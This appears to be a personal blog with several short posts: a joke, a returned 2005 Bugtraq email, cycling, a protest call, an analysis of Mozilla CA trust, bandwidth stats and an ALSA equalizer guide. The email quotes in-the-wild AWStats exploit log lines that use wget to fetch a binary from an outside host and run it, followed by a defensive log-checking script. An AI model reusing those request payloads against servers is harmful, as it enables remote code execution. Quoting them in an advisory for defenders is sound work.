This year the situation isn't good either. The scale points to 83 kilos. The belly has reached unprecedented bulges.
On LazEr's Day Darth Vader discovered the laser sword and .. cut off his own hand. Then he saw that the laser was a good thing and operated on himself to put it back on. Alas, the laser alone, and the Force that came with it, were not enough to cope with the hard task with only one hand. He said to himself:
The Force is the Force, but a surgeon studies for 10 years ..
He switched off the sword, sniffed the piece of arm cut off at the elbow, and threw it to the starving dog, which had been watching the arm and licking its lips. Then he said:
Enjoy it ..
Yesterday I received a delivery failure notice for a message which I sent over 7 years ago!
Here is the message in its entirety:
Return-Path: <>
Delivered-To: krustev.net-krustev@krustev.net
Received: (qmail 18822 invoked from network); 24 Mar 2012 23:40:23 -0000
Received: from osaka.tehbass.nl (HELO osaka.tehbass.nl) (141.105.120.64)
by home.krustev.net (qpsmtpd/0.84) with ESMTP; Sun, 25 Mar 2012 01:40:23 +0200
X-Bad-Reverse-DNS: no (dnsname - 'osaka.tehbass.nl', dnsip - '141.105.120.64')
Received: by osaka.tehbass.nl (Postfix)
id 27D574C6C9; Sun, 25 Mar 2012 00:40:52 +0100 (CET)
Date: Sun, 25 Mar 2012 00:40:52 +0100 (CET)
From: MAILER-DAEMON@osaka.tehbass.nl (Mail Delivery System)
Subject: Undelivered Mail Returned to Sender
To: krustev@krustev.net
Auto-Submitted: auto-replied
MIME-Version: 1.0
Content-Type: multipart/report;
report-type=delivery-status;
boundary="1A3704C621.1332632452/osaka.tehbass.nl"
Content-Transfer-Encoding: 8bit
Message-Id: <20120324234052.27D574C6C9@osaka.tehbass.nl>
X-Length: 6718
X-UID: 5914
This is a MIME-encapsulated message.
--1A3704C621.1332632452/osaka.tehbass.nl
Content-Description: Notification
Content-Type: text/plain; charset=us-ascii
This is the mail system at host osaka.tehbass.nl.
I'm sorry to have to inform you that your message could not
be delivered to one or more recipients. It's attached below.
For further assistance, please send mail to postmaster.
If you do so, please include this problem report. You can
delete your own text from the attached returned message.
The mail system
<sjm@localhost.tehbass.nl> (expanded from <sjm@localhost>): cannot update
mailbox /var/spool/mail/sjm for user sjm. error writing message: File too
large
--1A3704C621.1332632452/osaka.tehbass.nl
Content-Description: Delivery report
Content-Type: message/delivery-status
Reporting-MTA: dns; osaka.tehbass.nl
X-Postfix-Queue-ID: 1A3704C621
X-Postfix-Sender: rfc822; krustev@krustev.net
Arrival-Date: Sun, 25 Mar 2012 00:40:52 +0100 (CET)
Final-Recipient: rfc822; sjm@localhost.tehbass.nl
Original-Recipient: rfc822;sjm@localhost
Action: failed
Status: 5.2.2
Diagnostic-Code: x-unix; input/output error
--1A3704C621.1332632452/osaka.tehbass.nl
Content-Description: Undelivered Message
Content-Type: message/rfc822
Content-Transfer-Encoding: 8bit
Return-Path: <krustev@krustev.net>
Received: from osaka.tehbass.nl (localhost [127.0.0.1])
by osaka.tehbass.nl (Postfix) with ESMTP id 1A3704C621
for <sjm@localhost>; Sun, 25 Mar 2012 00:40:52 +0100 (CET)
Delivered-To: sjtmulder1981@gmail.com
Received: from gmail-pop.l.google.com [74.125.79.108]
by osaka.tehbass.nl with POP3 (fetchmail-6.3.21)
for <sjm@localhost> (single-drop); Sun, 25 Mar 2012 00:40:52 +0100 (CET)
Received: by 10.216.80.104 with SMTP id j82cs110797wee;
Mon, 3 May 2010 01:21:44 -0700 (PDT)
Received: by 10.216.173.69 with SMTP id u47mr5747536wel.227.1272874451923;
Mon, 03 May 2010 01:14:11 -0700 (PDT)
Received-SPF: neutral (google.com: 213.19.161.176 is neither permitted nor denied by best guess record for domain of pop.vevida.com) client-ip=213.19.161.176;
Received: by 10.241.241.82 with POP3 id 18mf39140wwb.56;
Mon, 03 May 2010 01:14:11 -0700 (PDT)
X-Gmail-Fetch-Info: groen@nl-crew.com 1 pop.gmail.com 995 groen@nl-crew.com
Received: from localhost (localhost.localdomain [127.0.0.1])
by lisa2xl.intranet.mens.nl.nu (8.12.11/8.12.11) with ESMTP id j0RLUcXT009387
for <bas@localhost>; Thu, 27 Jan 2005 21:31:14 GMT
Delivered-To: postmaster@aspprojects.nl
Received: from pop.vevida.com [213.19.161.176]
by localhost with POP3 (fetchmail-6.2.5)
for bas@localhost (single-drop); Thu, 27 Jan 2005 21:31:14 +0000 (GMT)
Received: (qmail 32077 invoked by uid 89); 27 Jan 2005 00:46:25 -0000
Delivered-To: aspprojects.nl-sjt@aspprojects.nl
Received: (qmail 32072 invoked by uid 0); 27 Jan 2005 00:46:25 -0000
Received: from frost.nl-crew.com (84.244.131.214)
by net3-nl-mail-04.ad.vevida.net with SMTP; 27 Jan 2005 00:46:25 -0000
Received: from [205.206.231.27] (outgoing.securityfocus.com [205.206.231.27])
by frost.nl-crew.com (Postfix) with ESMTP id 5AB8468492
for <bugtrack@mrgreen.eu.org>; Thu, 27 Jan 2005 01:45:28 +0000 (GMT)
Received: from no.name.available by [205.206.231.27]
via smtpd (for [84.244.131.214] [84.244.131.214]) with ESMTP; Wed, 26 Jan 2005 16:46:24 -0800
Received: from lists2.securityfocus.com (lists2.securityfocus.com [205.206.231.20])
by outgoing3.securityfocus.com (Postfix) with QMQP
id 27D2323728F; Wed, 26 Jan 2005 16:14:40 -0700 (MST)
Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm
Precedence: bulk
List-Id: <bugtraq.list-id.securityfocus.com>
List-Post: <mailto:bugtraq@securityfocus.com>
List-Help: <mailto:bugtraq-help@securityfocus.com>
List-Unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
List-Subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
Delivered-To: mailing list bugtraq@securityfocus.com
Delivered-To: moderator for bugtraq@securityfocus.com
Received: (qmail 3685 invoked from network); 26 Jan 2005 12:59:54 -0000
Content-Type: text/plain;
charset="iso-8859-1"
From: Delian Krustev <krustev@krustev.net>
To: bugtraq@securityfocus.com,
full-disclosure@lists.netsys.com,
security-alerts@linuxsecurity.com
Subject: Re: [ GLSA 200501-36 ] AWStats: Remote code execution
Date: Wed, 26 Jan 2005 20:31:51 +0200
User-Agent: KMail/1.4.3
References: <20050125201313.GA8733@tomservo.ne1.client2.attbi.c>
In-Reply-To: <20050125201313.GA8733@tomservo.ne1.client2.attbi.c>
MIME-Version: 1.0
Message-Id: <200501262031.51944.krustev@krustev.net>
X-Spam-Status: No, hits=0.0 required=5.0, tests=none, version=3.0.2
Content-Transfer-Encoding: 8bit
X-MIME-Autoconverted: from quoted-printable to 8bit by lisa2xl.intranet.mens.nl.nu id j0RLUcXT009387
Status: RO
X-Status:
X-Keywords:
X-UID: 3728
There's an exploit in the wild. Here's what it does:
200.96.166.252 - - [26/Jan/2005:06:32:00 +0000] "GET /cgi-bin/awstats/awstats.pl?configdir=|cd%20/tmp;wget%20http://www.nokiacentrum.cz/dcha0s/cgi;ls%20-la%20cgi;chmod%20777%20cgi;./cgi;%00 HTTP/1.1" 200 538 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
200.96.166.252 - - [26/Jan/2005:06:34:30 +0000] "GET /cgi-bin/awstats/awstats.pl?configdir=|cd%20/tmp;wget%20http://www.nokiacentrum.cz/dcha0s/dc;chmod%20777%20dc;./dc%20cyber.yar.ru%208080;%00 HTTP/1.1" 200 554 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
I don't have the time to investigate the "cgi" and "dc" binaries.
The "cgi" at least tries to daemonize and opens a TCP listening socket.
They also try to replace the index page on the vulnerable site.
--1A3704C621.1332632452/osaka.tehbass.nl--
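Added example, not part of the original message or post: a Python check that flags awstats.pl requests like the two quoted in the message above, where the percent-decoded configdir parameter carries shell metacharacters or a NUL byte. The function name, the character set and the sample log lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import unquote

# Combined Log Format: ip ident user [time] "METHOD target PROTO" status size ...
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+)[^"]*" (\d{3}) ')

# Characters a directory name passed as configdir has no reason to contain.
SHELL_META = re.compile(r'[|;&`$<>\x00\r\n]')

# Constructed sample lines (not from the original post); 192.0.2.0/24 is a
# documentation range and the command is a harmless placeholder.
SAMPLE_LOG = [
    '192.0.2.10 - - [26/Jan/2005:06:32:00 +0000] "GET /cgi-bin/awstats/awstats.pl'
    '?configdir=|echo%20constructed;%00 HTTP/1.1" 200 538 "-" "-"',
    '192.0.2.20 - - [26/Jan/2005:06:33:10 +0000] "GET /cgi-bin/awstats/awstats.pl'
    '?config=example.org&configdir=/etc/awstats HTTP/1.1" 200 9120 "-" "-"',
    '192.0.2.30 - - [26/Jan/2005:06:35:00 +0000] "GET /index.html HTTP/1.1" 200 1043 "-" "-"',
]


def suspicious_awstats_hits(lines):
    """Return (client_ip, time, status, decoded_configdir) for flagged requests."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not an access-log line we understand
        ip, when, _method, target, status = m.groups()
        path, _, query = target.partition("?")
        if not path.endswith("awstats.pl"):
            continue
        # Split on '&' only, then percent-decode, so %20 and %00 are inspected
        # in the form the CGI script would see them.
        for pair in query.split("&"):
            name, _, raw = pair.partition("=")
            value = unquote(raw)
            if name == "configdir" and SHELL_META.search(value):
                hits.append((ip, when, int(status), value))
    return hits


if __name__ == "__main__":
    for hit in suspicious_awstats_hits(SAMPLE_LOG):
        print(hit)
```

The status code is returned with each hit because a 200, as in the quoted log lines, shows the script answered the request rather than the server rejecting it.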
Today I took the bike out for the first time this year. In the morning I started with a spring cleaning of the playground next to our block. After that I pedalled over to Mladost. It was warm enough for just a T-shirt. But I think I'll be going home by metro tonight, as the evenings are still chilly ..
I'm glad that cyclists have come out early this year. Maybe little by little we will start to realise how convenient and healthy this kind of transport is :-)
Eh, this is ridiculous. It hasn't even been four weeks since I last updated my desktop, and there are 530 packages waiting for me to upgrade ..
--- Upgradable Packages (530)
--- Installed Packages (1099)
--- Not Installed Packages (39151)
--- Obsolete and Locally Created Packages (22)
--- Virtual Packages (7094)
--- Tasks (727)
I'm looking for one person to back me up for a protest in front of the parliament. Our demands will be:
We'll agree on when to protest. We'll make signs. First we start protesting. Then we look for more people sympathetic to the idea.
Update: 2012-03-24 I'm still looking for that person. Nobody has got in touch. The whole point is protesting regularly. It can be brief, but regular :-)
I have recently read this article:
Trustwave admits issuing man-in-the-middle digital certificate; Mozilla debates punishment
Trustwave is one of the Certificate Authorities (CAs) and has four certificates included in Mozilla's trust chain. Mozilla's trust chain is used by most web browsers and by most of the software that uses SSL verification and encryption.
What the article says is that Trustwave has issued an intermediate CA certificate to a third-party company. Such a certificate could be used for on-the-fly certificate generation, and thus for sniffing SSL traffic. Furthermore, Trustwave has called this a common industry practice.
For the end user this means that the green bar in the browser's address bar does not guarantee that they are actually speaking to the website whose URL is written there. This also makes the encryption in use useless.
147 CA certificates are included in the Mozilla trust chain. This is how they are distributed by country:
56 C=US,
7 C=HU,
6 C=ES,
6 C=DE,
5 C=TR,
5 C=JP,
5 C=GB,
4 C=SE,
4 C=FR,
4 C=EU,
4 C=CH,
3 C=TW,
3 C=IL,
3 C=BM,
2 C=ZA,
2 C=PL,
2 C=NO,
2 C=NL,
2 C=FI,
2 C=DK,
1 C=SK,
1 C=RO,
1 C=IE,
1 C=HK,
1 C=GR,
1 C=EE,
1 C=CO,
1 C=CN,
1 C=ch,
1 C=BE,
1 C=AT,
Some of them do not have a country specified:
O=Cybertrust, Inc, CN=Cybertrust Global Root
O=Digital Signature Trust Co., CN=DST Root CA X3
O=Entrust.net, OU=www.entrust.net/CPS_2048 incorp. by ref. (limits liab.), OU=(c) 1999 Entrust.net Limited, CN=Entrust.net Certification Authority (2048)
OU=GlobalSign Root CA - R2, O=GlobalSign, CN=GlobalSign
OU=GlobalSign Root CA - R3, O=GlobalSign, CN=GlobalSign
L=ValiCert Validation Network, O=ValiCert, Inc., OU=ValiCert Class 3 Policy Validation Authority, CN=http://www.valicert.com//emailAddress=info@valicert.com
O=RSA Security Inc, OU=RSA Security 2048 V3
L=ValiCert Validation Network, O=ValiCert, Inc., OU=ValiCert Class 1 Policy Validation Authority, CN=http://www.valicert.com//emailAddress=info@valicert.com
L=ValiCert Validation Network, O=ValiCert, Inc., OU=ValiCert Class 2 Policy Validation Authority, CN=http://www.valicert.com//emailAddress=info@valicert.com
If we look at the Organization tag, we will see that these certificates have been issued by 83 different organizations:
12 O=VeriSign, Inc.
7 O=GeoTrust Inc.
4 O=TC TrustCenter GmbH
4 O=NetLock Halozatbiztonsagi Kft.
4 O=AffirmTrust
4 O=AddTrust AB
3 O=ValiCert, Inc.
3 O=The USERTRUST Network
3 O=thawte, Inc.
3 O=SwissSign AG
3 O=Starfield Technologies, Inc.
3 O=QuoVadis Limited
3 O=Digital Signature Trust Co.
3 O=DigiCert Inc
3 O=Comodo CA Limited
2 O=Thawte Consulting cc
2 O=Staat der Nederlanden
2 O=Sonera
2 O=SecureTrust Corporation
2 O=SECOM Trust Systems CO.,LTD.
2 O=Microsec Ltd.
2 O=GlobalSign
2 O=Equifax Secure Inc.
2 O=Entrust.net
2 O=ComSign
2 O=COMODO CA Limited
2 O=Buypass AS-983163327
2 O=America Online Inc.
2 O=AC Camerfirma SA CIF A82743287
2 O=AC Camerfirma S.A.
1 O=XRamp Security Services Inc
1 O=WISeKey
1 O=Wells Fargo WellsSecure
1 O=Wells Fargo
1 O=VISA
1 O=Unizeto Technologies S.A.
1 O=Unizeto Sp. z o.o.
1 O=T\xC3\xBCrkiye Bilimsel ve Teknolojik Ara\xC5\x9Ft\xC4\xB1rma Kurumu - T\xC3\x9CB\xC4\xB0TAK
1 O=T\xC3\x9CRKTRUST Bilgi \xC4\xB0leti\xC5\x9Fim ve Bili\xC5\x9Fim G\xC3\xBCvenli\xC4\x9Fi Hizmetleri A.\xC5\x9E. (c) Kas\xC4\xB1m 2005
1 O=The Go Daddy Group, Inc.
1 O=TDC Internet
1 O=TDC
1 O=TAIWAN-CA
1 O=Swisscom
1 O=StartCom Ltd.
1 O=Sociedad Cameral de Certificaci\xC3\xB3n Digital - Certic\xC3\xA1mara S.A.
1 O=SECOM Trust.net
1 O=RSA Security Inc
1 O=PM/SGDN
1 O=Network Solutions L.L.C.
1 O=NetLock Kft.
1 O=Japanese Government
1 O=Japan Certification Services, Inc.
1 O=IZENPE S.A.
1 O=Hongkong Post
1 O=Hellenic Academic and Research Institutions Cert. Authority
1 O=GTE Corporation
1 O=Government Root Certification Authority
1 O=GoDaddy.com, Inc.
1 O=GlobalSign nv-sa
1 O=Generalitat Valenciana
1 O=Equifax Secure
1 O=Equifax
1 O=Entrust, Inc.
1 O=Elektronik Bilgi Guvenligi A.S.
1 O=EDICOM
1 O=EBG Bili\xC5\x9Fim Teknolojileri ve Hizmetleri A.\xC5\x9E.
1 O=Disig a.s.
1 O=Digital Signature Trust
1 O=Dhimyotis
1 O=Deutsche Telekom AG
1 O=Deutscher Sparkassen Verlag GmbH
1 O=Cybertrust, Inc
1 O=CNNIC
1 O=Chunghwa Telecom Co., Ltd.
1 O=certSIGN
1 O=Certplus
1 O=Certinomis
1 O=(c) 2005 T\xC3\x9CRKTRUST Bilgi \xC4\xB0leti\xC5\x9Fim ve Bili\xC5\x9Fim G\xC3\xBCvenli\xC4\x9Fi Hizmetleri A.\xC5\x9E.
1 O=Baltimore
1 O=A-Trust Ges. f. Sicherheitssysteme im elektr. Datenverkehr GmbH
1 O=AS Sertifitseerimiskeskus
1 O=Agencia Catalana de Certificacio (NIF Q-0801176-I)
By using the Mozilla trust chain we trust all these organizations. All of them have the power to sniff SSL traffic. All of them have the power to delegate the sniffing power to anyone else. This is not news to anyone who was paying attention. What is news, at least to me, is that they have admitted to actually engaging in this bad practice.
All this shows how the most common trust model on the web is broken.
One option is to carefully choose the trust chain that we use. However, this is not doable on a global/Internet scale.
Another option has been provided by Dan Bernstein. He invented and proposed new encryption functions and protocols for the web:
Hopefully it will be widely accepted.
P.S. Here's an example command I've used to get certificate statistics:
cat /usr/share/ca-certificates/mozilla/* | \
perl -we 'my $F; while(<>) { m/BEGIN / and open($F, "|openssl x509 -text"); print $F $_ }' | \
egrep 'Subject:' | \
perl -wne 'my @a = m/(\w+\=.+?)(?=(?:, \w+\=|$))/g; print "$_\n" foreach grep(/^O=/, @a);' | \
sort | \
uniq -c | \
sort -rn
Options:
======================================================= <-- (-) page 1/2 (+) --> =
Window length for average (s): 300
Max Incoming deflection (kBit/s): 100000
Max Outgoing deflection (kBit/s): 100000
Unit for data numbers: Human Readable (Byte)
Device eth0 [85.11.178.49] (1/1):
==================================================================================
Incoming:
... ... ..|..... .
####||##############|.. .|#... ... . ..|||
###############################|||.....|############## Curr: 63.80 MBit/s
###################################################### Avg: 57.86 MBit/s
###################################################### Min: 46.76 MBit/s
###################################################### Max: 73.52 MBit/s
###################################################### Ttl: 3.92 GByte
Outgoing:
Curr: 2.80 MBit/s
Avg: 2.43 MBit/s
Min: 1.99 MBit/s
Max: 2.92 MBit/s
Ttl: 221.43 MByte
Downloading 2 torrent files. Avg download speed about 60 Mbits.
Internet service provider: TV Net (former Sofia Cable Company).
Paying 33 BGL (about USD 20) monthly for a package - internet + analog TV (80 channels).
Ever wondered how to have a system-wide equalizer for ALSA?! Once I wondered too. Now I know.
One option is to use LADSPA:
$ sudo apt-get install caps
$ cat ~/.asoundrc
pcm.!default {
    type plug
    slave.pcm "equalized";
}
pcm.equalized {
    type ladspa
    slave.pcm "plug:dmix";
    path "/usr/lib/ladspa";
    plugins [
        {
            id 1773
            input {
                controls [ -5 -5 -5 -5 -5 -5 1 3 7 1 ]
            }
        }
    ]
}
Unfortunately this does not allow on-the-fly mixer level adjustments: you have to edit ~/.asoundrc and restart every process that should use the adjusted mixer levels.
Recently I found another option though. It supports real-time equalizer adjustments:
$ sudo apt-get install libasound2-plugin-equal
$ cat ~/.asoundrc
pcm.!default {
    type plug
    slave.pcm "plugequal";
}
ctl.equal {
    type equal;
}
pcm.plugequal {
    type equal;
    slave.pcm "plug:dmix";
}
$ alsamixer -D equal
$ alsamixergui -D equal
Just a reminder. The default levels are: 25 for 31 Hz (leftmost) and 66 for all the rest.
The levels can be reset by deleting ~/.alsaequal.bin. Doing this manually requires a restart of the processes that used it.